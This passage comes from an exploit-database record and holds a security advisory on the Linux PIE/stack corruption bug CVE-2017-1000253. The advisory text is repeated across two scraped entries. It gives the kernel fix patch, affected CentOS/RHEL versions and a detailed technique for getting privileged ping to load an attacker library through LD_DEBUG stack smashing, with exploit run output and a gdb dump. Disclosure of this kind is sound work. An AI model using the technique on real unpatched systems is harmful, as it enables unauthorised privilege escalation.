/tmp/PIE\r\n7ffbad999000-7ffbadb97000 rw-p 00000000 00:00 0 [stack]\r\n7ffbadb97000-7ffbadb98000 r--p 00001000 fd:00 4194375 /tmp/PIE\r\n7ffbadb98000-7ffbadbb9000 rw-p 00002000 fd:00 4194375 /tmp/PIE\r\n7ffbadbba000-7ffc0d9ba000 rw-p 00000000 00:00 0 [heap]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\r\nrsp 0x7ffbad9a0978\r\n\r\nIn this example, the kernel's execve() code erroneously mapped the PIE's\r\nread-write segment into the stack memory region, thus corrupting and\r\ndividing the stack into three parts:\r\n\r\n- 7ffbad999000-7ffbadb97000, the lowest part of the stack, is where the\r\n stack pointer (rsp) points to, after execve() returns to the userland;\r\n\r\n- 7ffbadb97000-7ffbadbb9000, the middle part of the stack, was replaced\r\n by the PIE's read-write segment (7ffbadb97000-7ffbadb98000 was later\r\n mprotect()ed read-only by RELRO), and hence a write to this part of\r\n the stack smashes the PIE's read-write segment, and vice versa;\r\n\r\n- 7ffbadbba000-7ffc0d9ba000, the highest part of the stack, is\r\n incorrectly displayed as the \"[heap]\" in /proc/pid/maps (because the\r\n program brk() points there), but is correctly flagged as a stack in\r\n /proc/pid/smaps (the \"gd\" flag, \"grows down\").\r\n\r\nThis kernel vulnerability was fixed in April 2015 by commit\r\na87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to Linux 3.10.77 in\r\nMay 2015), but it was not recognized as a security threat. This fix was\r\ntherefore not backported to long-term distributions such as CentOS:\r\n\r\n------------------------------------------------------------------------\r\n\r\nFrom: Michael Davidson <[email\u00a0protected]>\r\nDate: Tue, 14 Apr 2015 15:47:38 -0700\r\nSubject: fs/binfmt_elf.c: fix bug in loading of PIE binaries\r\n\r\nWith CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a normal top-down\r\naddress allocation strategy, load_elf_binary() will attempt to map a PIE\r\nbinary into an address range immediately below mm->mmap_base.\r\n\r\nUnfortunately, load_elf_ binary() does not take account of the need to\r\nallocate sufficient space for the entire binary which means that, while\r\nthe first PT_LOAD segment is mapped below mm->mmap_base, the subsequent\r\nPT_LOAD segment(s) end up being mapped above mm->mmap_base into the are\r\nthat is supposed to be the \"gap\" between the stack and the binary.\r\n\r\nSince the size of the \"gap\" on x86_64 is only guaranteed to be 128MB this\r\nmeans that binaries with large data segments > 128MB can end up mapping\r\npart of their data segment over their stack resulting in corruption of the\r\nstack (and the data segment once the binary starts to run).\r\n\r\nAny PIE binary with a data segment > 128MB is vulnerable to this although\r\naddress randomization means that the actual gap between the stack and the\r\nend of the binary is normally greater than 128MB. The larger the data\r\nsegment of the binary the higher the probability of failure.\r\n\r\nFix this by calculating the total size of the binary in the same way as\r\nload_elf_interp().\r\n\r\nSigned-off-by: Michael Davidson <[email\u00a0protected]>\r\nCc: Alexander Viro <[email\u00a0protected]>\r\nCc: Jiri Kosina <[email\u00a0protected]>\r\nCc: Kees Cook <[email\u00a0protected]>\r\nCc: <[email\u00a0protected]>\r\nSigned-off-by: Andrew Morton <[email\u00a0protected]>\r\nSigned-off-by: Linus Torvalds <[email\u00a0protected]>\r\n---\r\n fs/binfmt_elf.c | 9 ++++++++-\r\n 1 file changed, 8 insertions(+), 1 deletion(-)\r\n\r\ndiff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c\r\nindex 995986b..d925f55 100644\r\n--- a/fs/binfmt_elf.c\r\n+++ b/fs/binfmt_elf.c\r\n@@ -862,6 +862,7 @@ static int load_elf_binary(struct linux_binprm *bprm)\r\n i < loc->elf_ex.e_phnum; i++, elf_ppnt++) {\r\n int elf_prot = 0, elf_flags;\r\n unsigned long k, vaddr;\r\n+ unsigned long total_size = 0;\r\n \r\n if (elf_ppnt->p_type != PT_LOAD)\r\n continue;\r\n@@ -924,10 +925,16 @@ static int load_elf_binary(struct linux_binprm *bprm)\r\n #else\r\n load_bias = ELF_PAGESTART(ELF_ET_DYN_BASE - vaddr);\r\n #endif\r\n+ total_size = total_mapping_size(elf_phdata,\r\n+ loc->elf_ex.e_phnum);\r\n+ if (!total_size) {\r\n+ error = -EINVAL;\r\n+ goto out_free_dentry;\r\n+ }\r\n }\r\n \r\n error = elf_map(bprm->file, load_bias + vaddr, elf_ppnt,\r\n- elf_prot, elf_flags, 0);\r\n+ elf_prot, elf_flags, total_size);\r\n if (BAD_ADDR(error)) {\r\n retval = IS_ERR((void *)error) ?\r\n PTR_ERR((void*)error) : -EINVAL;\r\n\r\n------------------------------------------------------------------------\r\n\r\nUnfortunately, this vulnerability is not limited to the PIEs whose\r\nread-write segment is larger than 128MB. Indeed, 128MB is the minimum\r\ndistance between the mmap_base and the highest address of the stack, not\r\nthe lowest address of the stack (CVE-2017-1000379): consequently, and as\r\nshown in our Stack Clash advisory, if we pass 1.5GB of argument strings\r\nto execve(), then any PIE may be mapped directly below the stack (and\r\ntrigger CVE-2017-1000253) with a probability of ~1/17331 (5 hours on\r\naverage, if each run takes 1 second).\r\n\r\n------------------------------------------------------------------------\r\nPost-Stack-Clash kernels\r\n------------------------------------------------------------------------\r\n\r\nAs a proof-of-concept, we will publish CVE-2017-1000253.c, an exploit\r\nfor ping on CentOS-7 kernel versions \"3.10.0-514.21.2.el7.x86_64\" and\r\n\"3.10.0-514.26.1.el7.x86_64\" (the first kernel updates after the Stack\r\nClash). The PIE/stack layout on these post-Stack-Clash kernels differs\r\nslightly from the layout on pre-Stack-Clash kernels, since the size of\r\nthe stack guard-page was increased from 4KB to 1MB:\r\n\r\nLinux localhost.localdomain 3.10.0-514.26.1.el7.x86_64 #1 SMP Thu Jun 29 16:05:25 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\r\n\r\n7ffba9ee4000-7ffbaa09b000 r-xp 00000000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbaa09b000-7ffbaa29a000 ---p 001b7000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbaa29a000-7ffbaa29e000 r--p 001b6000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbaa29e000-7ffbaa2a0000 rw-p 001ba000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbaa2a0000-7ffbaa2a5000 rw-p 00000000 00:00 0 \r\n7ffbaa2a5000-7ffbaa2c5000 r-xp 00000000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbaa499000-7ffbaa4bd000 rw-p 00000000 00:00 0 \r\n7ffbaa4c2000-7ffbaa4c3000 rw-p 00000000 00:00 0 \r\n7ffbaa4c3000-7ffbaa4c5000 r-xp 00000000 00:00 0 [vdso]\r\n7ffbaa4c5000-7ffbaa4c6000 r--p 00020000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbaa4c6000-7ffbaa4c7000 rw-p 00021000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbaa4c7000-7ffbaa4c8000 rw-p 00000000 00:00 0 \r\n7ffbaa4c8000-7ffbaa4ca000 r-xp 00000000 fd:00 4194375 /tmp/PIE\r\n7ffbaa5ca000-7ffbaa6c9000 rw-p 00000000 00:00 0 \r\n7ffbaa6c9000-7ffbaa6ca000 r--p 00001000 fd:00 4194375 /tmp/PIE\r\n7ffbaa6ca000-7ffbaa6eb000 rw-p 00002000 fd:00 4194375 /tmp/PIE\r\n7ffbaa7eb000-7ffc0a6eb000 rw-p 00000000 00:00 0 [heap]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\r\nrsp 0x7ffbaa6d1c18\r\n\r\nIn this example, the kernel's execve() code also mapped the PIE's\r\nread-write segment into the stack memory region, and divided the stack\r\ninto three parts, but:\r\n\r\n- 7ffbaa5ca000-7ffbaa6c9000, the lowest part of the stack, is not\r\n displayed as the \"[stack]\" in /proc/pid/maps (because rsp does not\r\n point there), but is correctly flagged as a stack in /proc/pid/smaps;\r\n\r\n- 7ffbaa6c9000-7ffbaa6eb000, the middle part of the stack, was replaced\r\n by the PIE's read-write segment, and is where rsp points to, after\r\n execve() returns to the userland;\r\n\r\n- 7ffbaa7eb000-7ffc0a6eb000, the highest part of the stack, is (again)\r\n incorrectly displayed as the \"[heap]\" in /proc/pid/maps, but is\r\n correctly flagged as a stack in /proc/pid/smaps.\r\n\r\nOlder kernels (such as \"3.10.0-514.21.1.el7.x86_64\") and newer kernels\r\n(such as \"3.10.0-514.26.2.el7.x86_64\"), other distributions and other\r\nprivileged PIEs (including SUID-root PIEs), are also exploitable, but\r\nthe exploitation method must be adapted to slightly different PIE/stack\r\nlayouts. This is left as an exercise for the interested reader.\r\n\r\n\r\n========================================================================\r\nExploitation\r\n========================================================================\r\n\r\nOur CVE-2017-1000253.c exploit for CentOS-7 kernel versions\r\n\"3.10.0-514.21.2.el7.x86_64\" and \"3.10.0-514.26.1.el7.x86_64\" is very\r\nsimilar to our stack-clash exploit Linux_ldso_dynamic.c (we smash the\r\nPIE's .dynamic section with a stack-based string operation, and force\r\nld.so to load and execute our own shared library), but with two\r\nimportant differences:\r\n\r\n- we do not need to jump over the stack guard-page, because rsp\r\n naturally points into the PIE's read-write segment after we trigger\r\n CVE-2017-1000253;\r\n\r\n- on 64-bit, all .dynamic tags contain null-bytes, a serious problem if\r\n we want to smash the .dynamic section with a null-terminated string.\r\n\r\nTo solve this problem, we smash the .dynamic section with multiple calls\r\nto process_dl_debug(), a function called by process_envvars() very early\r\nin dl_main(), before elf_get_dynamic_info() parses the .dynamic section.\r\nprocess_dl_debug() is called for each LD_DEBUG environment variable, and\r\ncalls strndupa() (strnlen(), alloca(), memcpy()) for each unknown option\r\nin LD_DEBUG, thus allowing us to smash the .dynamic section with\r\nmultiple null-terminated strings, and hence multiple null-bytes.\r\n\r\nUnfortunately, the .dynamic entries that we build on the stack with\r\nprocess_dl_debug():\r\n\r\n- DT_SYMTAB (tag 0x0000000000000006, value unused);\r\n\r\n- DT_STRTAB (tag 0x0000000000000005), an offset (into the PIE's\r\n read-execute segment) to our own .dynstr section -- this is later\r\n transformed by elf_get_dynamic_info() into an absolute address,\r\n allowing us to bypass ASLR;\r\n\r\n- DT_NEEDED (tag 0x0000000000000001), an offset (into our .dynstr\r\n section) to the pathname of our own shared library -- we use offset\r\n 0x238+1 into the PIE's read-execute segment, where the string\r\n \"lib64/ld-linux-x86-64.so.2\" is always stored;\r\n\r\n- DT_NULL (tag 0x0000000000000000, value unused);\r\n\r\nare partially destroyed by the stack-frames of further function calls\r\n(_dl_error_printf(), for example). Our solution to this problem is very\r\nspecific to CentOS 7, and restricts this particular exploit to the PIEs\r\nwhose .dynamic section's address modulo 16 is equal to 8:\r\n\r\n- we build our .dynamic tags through a stack variable used by memcpy()\r\n to store the address modulo 16 of the unknown options in LD_DEBUG;\r\n\r\n- we store our .dynamic values in an unused slot of process_dl_debug()'s\r\n stack-frame.\r\n\r\nOne last, unexpected problem with this particular exploit is that rsp\r\ncan never point into the highest part of the stack (after the kernel's\r\nexecve() code divided the stack into three parts): indeed, the kernel's\r\npage-fault handler would then try to insert a stack guard-page below the\r\nhighest part of the stack, and would SIGKILL our process because the\r\nPIE's read-write segment is already mapped there.\r\n\r\nThe solution to this problem is simple, but further restricts this\r\nparticular exploit to the PIEs whose read-write segment is large enough\r\nto encompass rsp: the kernel's page-fault handler will not try to insert\r\na stack guard-page there, because the PIE's read-write segment is not\r\nflagged as a stack (VM_GROWSDOWN). For example, on a default, minimal\r\nCentOS 7, ping is privileged (cap_net_admin and cap_net_raw) and\r\nexploitable:\r\n\r\n[[email\u00a0protected] tmp]$ getcap -r / 2>/dev/null\r\n/usr/bin/ping = cap_net_admin,cap_net_raw+p\r\n...\r\n\r\n[[email\u00a0protected] tmp]$ readelf -a /usr/bin/ping\r\n...\r\n Type Offset VirtAddr PhysAddr\r\n FileSiz MemSiz Flags Align\r\n...\r\n LOAD 0x000000000000da58 0x000000000020da58 0x000000000020da58\r\n 0x0000000000000988 0x00000000000241e8 RW 200000\r\n DYNAMIC 0x000000000000da78 0x000000000020da78 0x000000000020da78\r\n 0x0000000000000240 0x0000000000000240 RW 8\r\n...\r\n\r\n[[email\u00a0protected] tmp]$ ./CVE-2017-1000253 /usr/bin/ping\r\nargv_size 101903\r\nsmash_size 36864\r\nhi_smash_size 18432\r\nlo_smash_size 18432\r\nprobability 1/16028\r\ntry 1 1.409649 exited 2\r\ntry 2 1.097508 exited 2\r\ntry 3 1.060084 exited 2\r\ntry 4 1.059042 exited 2\r\ntry 5 1.090841 exited 2\r\ntry 6 1.068993 exited 2\r\ntry 7 1.093662 exited 2\r\n...\r\ntry 3411 1.018799 exited 2\r\ntry 3412 1.022255 exited 2\r\ntry 3413 1.022062 exited 2\r\ntry 3414 1.061316 exited 2\r\ntry 3415 1.024066 exited 2\r\ntry 3416 1.024864 exited 2\r\ntry 3417 1.043867 exited 2\r\nPid: 6301\r\nUid: 1000 1000 1000\r\nGid: 1000 1000 1000\r\nCapInh: 0000000000000000\r\nCapPrm: 0000000000003000\r\nCapEff: 0000000000000000\r\n\r\n[[email\u00a0protected] tmp]# cat /proc/6301/status\r\nName: ping\r\n...\r\nPid: 6301\r\n...\r\nUid: 1000 1000 1000 1000\r\nGid: 1000 1000 1000 1000\r\n...\r\nCapInh: 0000000000000000\r\nCapPrm: 0000000000003000\r\nCapEff: 0000000000000000\r\n...\r\n\r\n[[email\u00a0protected] tmp]# cat /proc/6301/maps\r\n7ffbc573d000-7ffbc58f4000 r-xp 00000000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbc58f4000-7ffbc5af3000 ---p 001b7000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbc5af3000-7ffbc5af7000 r--p 001b6000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbc5af7000-7ffbc5af9000 rw-p 001ba000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbc5af9000-7ffbc5afe000 rw-p 00000000 00:00 0 \r\n7ffbc5afe000-7ffbc5aff000 r-xp 00000000 fd:00 4303255 /tmp/lib64/ld-linux-x86-64.so.2\r\n7ffbc5aff000-7ffbc5cfe000 ---p 00001000 fd:00 4303255 /tmp/lib64/ld-linux-x86-64.so.2\r\n7ffbc5cfe000-7ffbc5cff000 r--p 00000000 fd:00 4303255 /tmp/lib64/ld-linux-x86-64.so.2\r\n7ffbc5cff000-7ffbc5d00000 rw-p 00001000 fd:00 4303255 /tmp/lib64/ld-linux-x86-64.so.2\r\n7ffbc5d00000-7ffbc5d20000 r-xp 00000000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbc5f15000-7ffbc5f18000 rw-p 00000000 00:00 0 \r\n7ffbc5f1c000-7ffbc5f1e000 rw-p 00000000 00:00 0 \r\n7ffbc5f1e000-7ffbc5f20000 r-xp 00000000 00:00 0 [vdso]\r\n7ffbc5f20000-7ffbc5f21000 r--p 00020000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbc5f21000-7ffbc5f22000 rw-p 00021000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbc5f22000-7ffbc5f23000 rw-p 00000000 00:00 0 \r\n7ffbc5f23000-7ffbc5f31000 r-xp 00000000 fd:00 12968754 /usr/bin/ping\r\n7ffbc6031000-7ffbc6130000 rw-p 00000000 00:00 0 \r\n7ffbc6130000-7ffbc6131000 r--p 0000d000 fd:00 12968754 /usr/bin/ping\r\n7ffbc6131000-7ffbc6132000 rw-p 0000e000 fd:00 12968754 /usr/bin/ping\r\n7ffbc6132000-7ffbc6155000 rw-p 00000000 00:00 0 [stack]\r\n7ffbc6255000-7ffc29988000 rw-p 00000000 00:00 0 [heap]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\r\n\r\n[[email\u00a0protected] tmp]# gdb /usr/bin/ping 6301\r\n...\r\n(gdb) x/16384xg 0x7ffbc6130000 + 8\r\n0x7ffbc6130008: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130018: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130028: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130038: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130048: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130058: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6130068: 0x4141414141414141 0x4141414141414141\r\n...\r\n0x7ffbc6132678: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132688: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132698: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61326a8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61326b8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61326c8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61326d8: 0x4141414141414141 0x00007ffbc6132700\r\n0x7ffbc61326e8: 0x00007ffbc5d01463 0x4141414141410041\r\n0x7ffbc61326f8: 0x0000000000000005 0x888908844e7ab888\r\n0x7ffbc6132708: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc6132718: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132728: 0x0041414141414141 0x00007ffbc6132740\r\n0x7ffbc6132738: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc6132748: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132758: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132768: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132778: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132788: 0x4141414141414141 0x00007ffbc6132700\r\n0x7ffbc6132798: 0x00007ffbc5d01463 0x4141414141410041\r\n0x7ffbc61327a8: 0x0000000000000001 0x77777777777779b1\r\n0x7ffbc61327b8: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc61327c8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61327d8: 0x0041414141414141 0x00007ffbc61327f0\r\n0x7ffbc61327e8: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc61327f8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132808: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132818: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132828: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132838: 0x4141414141414141 0x00007ffbc6132800\r\n0x7ffbc6132848: 0x00007ffbc5d01463 0x4141414141410041\r\n0x7ffbc6132858: 0x0000000000000006 0x4848c8440e3a7848\r\n0x7ffbc6132868: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc6132878: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc6132888: 0x0000000000000000 0x00007ffbc61328a0\r\n0x7ffbc6132898: 0x00007ffbc5d01463 0x4141414141414141\r\n0x7ffbc61328a8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328b8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328c8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328d8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328e8: 0x4141414141414141 0x4141414141414141\r\n0x7ffbc61328f8: 0x4141414141414141 0x4141414141414141\r\n...\r\n(gdb) x/s 0x888908844e7ab888 + 0x77777777777779b1\r\n0x7ffbc5f23239: \"lib64/ld-linux-x86-64.so.2\"\r\n\r\n\r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n\r\nWe thank Red Hat and the members of the [email\u00a0protected] list.\n\n# 0day.today [2018-04-08] #", "sourceHref": "https://0day.today/exploit/28653", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-02-16T05:17:43", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2017-10-05T00:00:00", "type": "zdt", "title": "CentOS 7 before 1708 PIE/stack corruption Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10002"], "modified": "2017-10-05T00:00:00", "id": "1337DAY-ID-28745", "href": "https://0day.today/exploit/description/28745", "sourceData": "Linux PIE/stack corruption (CVE-2017-1000253)\r\n\r\n\r\n========================================================================\r\nContents\r\n========================================================================\r\n\r\nSummary\r\nAnalysis\r\nExploitation\r\nAcknowledgments\r\n\r\n\r\n========================================================================\r\nSummary\r\n========================================================================\r\n\r\nLinux distributions that have not patched their long-term kernels with\r\nhttps://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86\r\n(committed on April 14, 2015) are vulnerable to CVE-2017-1000253, a\r\nLocal Privilege Escalation.\r\n\r\nMost notably, all versions of CentOS 7 before 1708 (released on\r\nSeptember 13, 2017), all versions of Red Hat Enterprise Linux 7 before\r\n7.4 (released on August 1, 2017), and all versions of CentOS 6 and Red\r\nHat Enterprise Linux 6 are exploitable.\r\n\r\n\r\n========================================================================\r\nAnalysis\r\n========================================================================\r\n\r\n------------------------------------------------------------------------\r\nPre-Stack-Clash kernels\r\n------------------------------------------------------------------------\r\n\r\nOccasionally, we have noticed a strange behavior with PIEs\r\n(Position-Independent Executables) on CentOS 7:\r\n\r\nLinux localhost.localdomain 3.10.0-514.21.1.el7.x86_64 #1 SMP Thu May 25 17:04:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\r\n\r\n7ffbad3b3000-7ffbad56a000 r-xp 00000000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbad56a000-7ffbad769000 ---p 001b7000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbad769000-7ffbad76d000 r--p 001b6000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbad76d000-7ffbad76f000 rw-p 001ba000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbad76f000-7ffbad774000 rw-p 00000000 00:00 0 \r\n7ffbad774000-7ffbad794000 r-xp 00000000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbad967000-7ffbad98b000 rw-p 00000000 00:00 0 \r\n7ffbad990000-7ffbad991000 rw-p 00000000 00:00 0 \r\n7ffbad991000-7ffbad993000 r-xp 00000000 00:00 0 [vdso]\r\n7ffbad993000-7ffbad994000 r--p 0001f000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbad994000-7ffbad995000 rw-p 00020000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbad995000-7ffbad996000 rw-p 00000000 00:00 0 \r\n7ffbad996000-7ffbad998000 r-xp 00000000 fd:00 4194375 /tmp/PIE\r\n7ffbad999000-7ffbadb97000 rw-p 00000000 00:00 0 [stack]\r\n7ffbadb97000-7ffbadb98000 r--p 00001000 fd:00 4194375 /tmp/PIE\r\n7ffbadb98000-7ffbadbb9000 rw-p 00002000 fd:00 4194375 /tmp/PIE\r\n7ffbadbba000-7ffc0d9ba000 rw-p 00000000 00:00 0 [heap]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\r\nrsp 0x7ffbad9a0978\r\n\r\nIn this example, the kernel's execve() code erroneously mapped the PIE's\r\nread-write segment into the stack memory region, thus corrupting and\r\ndividing the stack into three parts:\r\n\r\n- 7ffbad999000-7ffbadb97000, the lowest part of the stack, is where the\r\n stack pointer (rsp) points to, after execve() returns to the userland;\r\n\r\n- 7ffbadb97000-7ffbadbb9000, the middle part of the stack, was replaced\r\n by the PIE's read-write segment (7ffbadb97000-7ffbadb98000 was later\r\n mprotect()ed read-only by RELRO), and hence a write to this part of\r\n the stack smashes the PIE's read-write segment, and vice versa;\r\n\r\n- 7ffbadbba000-7ffc0d9ba000, the highest part of the stack, is\r\n incorrectly displayed as the \"[heap]\" in /proc/pid/maps (because the\r\n program brk() points there), but is correctly flagged as a stack in\r\n /proc/pid/smaps (the \"gd\" flag, \"grows down\").\r\n\r\nThis kernel vulnerability was fixed in April 2015 by commit\r\na87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to Linux 3.10.77 in\r\nMay 2015), but it was not recognized as a security threat. This fix was\r\ntherefore not backported to long-term distributions such as CentOS:\r\n\r\n------------------------------------------------------------------------\r\n\r\nFrom: Michael Davidson <[email\u00a0protected]>\r\nDate: Tue, 14 Apr 2015 15:47:38 -0700\r\nSubject: fs/binfmt_elf.c: fix bug in loading of PIE binaries\r\n\r\nWith CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a normal top-down\r\naddress allocation strategy, load_elf_binary() will attempt to map a PIE\r\nbinary into an address range immediately below mm->mmap_base.\r\n\r\nUnfortunately, load_elf_ binary() does not take account of the need to\r\nallocate sufficient space for the entire binary which means that, while\r\nthe first PT_LOAD segment is mapped below mm->mmap_base, the subsequent\r\nPT_LOAD segment(s) end up being mapped above mm->mmap_base into the are\r\nthat is supposed to be the \"gap\" between the stack and the binary.\r\n\r\nSince the size of the \"gap\" on x86_64 is only guaranteed to be 128MB this\r\nmeans that binaries with large data segments > 128MB can end up mapping\r\npart of their data segment over their stack resulting in corruption of the\r\nstack (and the data segment once the binary starts to run).\r\n\r\nAny PIE binary with a data segment > 128MB is vulnerable to this although\r\naddress randomization means that the actual gap between the stack and the\r\nend of the binary is normally greater than 128MB. The larger the data\r\nsegment of the binary the higher the probability of failure.\r\n\r\nFix this by calculating the total size of the binary in the same way as\r\nload_elf_interp().\r\n\r\nSigned-off-by: Michael Davidson <[email\u00a0protected]>\r\nCc: Alexander Viro <[email\u00a0protected]>\r\nCc: Jiri Kosina <[email\u00a0protected]>\r\nCc: Kees Cook <[email\u00a0protected]>\r\nCc: <[email\u00a0protected]>\r\nSigned-off-by: Andrew Morton <[email\u00a0protected]>\r\nSigned-off-by: Linus Torvalds <[email\u00a0protected]>\r\n---\r\n fs/binfmt_elf.c | 9 ++++++++-\r\n 1 file changed, 8 insertions(+), 1 deletion(-)\r\n\r\ndiff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c\r\nindex 995986b..d925f55 100644\r\n--- a/fs/binfmt_elf.c\r\n+++ b/fs/binfmt_elf.c\r\n@@ -862,6 +862,7 @@ static int load_elf_binary(struct linux_binprm *bprm)\r\n i < loc->elf_ex.e_phnum; i++, elf_ppnt++) {\r\n int elf_prot = 0, elf_flags;\r\n unsigned long k, vaddr;\r\n+ unsigned long total_size = 0;\r\n \r\n if (elf_ppnt->p_type != PT_LOAD)\r\n continue;\r\n@@ -924,10 +925,16 @@ static int load_elf_binary(struct linux_binprm *bprm)\r\n #else\r\n load_bias = ELF_PAGESTART(ELF_ET_DYN_BASE - vaddr);\r\n #endif\r\n+ total_size = total_mapping_size(elf_phdata,\r\n+ loc->elf_ex.e_phnum);\r\n+ if (!total_size) {\r\n+ error = -EINVAL;\r\n+ goto out_free_dentry;\r\n+ }\r\n }\r\n \r\n error = elf_map(bprm->file, load_bias + vaddr, elf_ppnt,\r\n- elf_prot, elf_flags, 0);\r\n+ elf_prot, elf_flags, total_size);\r\n if (BAD_ADDR(error)) {\r\n retval = IS_ERR((void *)error) ?\r\n PTR_ERR((void*)error) : -EINVAL;\r\n\r\n------------------------------------------------------------------------\r\n\r\nUnfortunately, this vulnerability is not limited to the PIEs whose\r\nread-write segment is larger than 128MB. Indeed, 128MB is the minimum\r\ndistance between the mmap_base and the highest address of the stack, not\r\nthe lowest address of the stack (CVE-2017-1000379): consequently, and as\r\nshown in our Stack Clash advisory, if we pass 1.5GB of argument strings\r\nto execve(), then any PIE may be mapped directly below the stack (and\r\ntrigger CVE-2017-1000253) with a probability of ~1/17331 (5 hours on\r\naverage, if each run takes 1 second).\r\n\r\n------------------------------------------------------------------------\r\nPost-Stack-Clash kernels\r\n------------------------------------------------------------------------\r\n\r\nAs a proof-of-concept, we will publish CVE-2017-1000253.c, an exploit\r\nfor ping on CentOS-7 kernel versions \"3.10.0-514.21.2.el7.x86_64\" and\r\n\"3.10.0-514.26.1.el7.x86_64\" (the first kernel updates after the Stack\r\nClash). The PIE/stack layout on these post-Stack-Clash kernels differs\r\nslightly from the layout on pre-Stack-Clash kernels, since the size of\r\nthe stack guard-page was increased from 4KB to 1MB:\r\n\r\nLinux localhost.localdomain 3.10.0-514.26.1.el7.x86_64 #1 SMP Thu Jun 29 16:05:25 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\r\n\r\n7ffba9ee4000-7ffbaa09b000 r-xp 00000000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbaa09b000-7ffbaa29a000 ---p 001b7000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbaa29a000-7ffbaa29e000 r--p 001b6000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbaa29e000-7ffbaa2a0000 rw-p 001ba000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbaa2a0000-7ffbaa2a5000 rw-p 00000000 00:00 0 \r\n7ffbaa2a5000-7ffbaa2c5000 r-xp 00000000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbaa499000-7ffbaa4bd000 rw-p 00000000 00:00 0 \r\n7ffbaa4c2000-7ffbaa4c3000 rw-p 00000000 00:00 0 \r\n7ffbaa4c3000-7ffbaa4c5000 r-xp 00000000 00:00 0 [vdso]\r\n7ffbaa4c5000-7ffbaa4c6000 r--p 00020000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbaa4c6000-7ffbaa4c7000 rw-p 00021000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbaa4c7000-7ffbaa4c8000 rw-p 00000000 00:00 0 \r\n7ffbaa4c8000-7ffbaa4ca000 r-xp 00000000 fd:00 4194375 /tmp/PIE\r\n7ffbaa5ca000-7ffbaa6c9000 rw-p 00000000 00:00 0 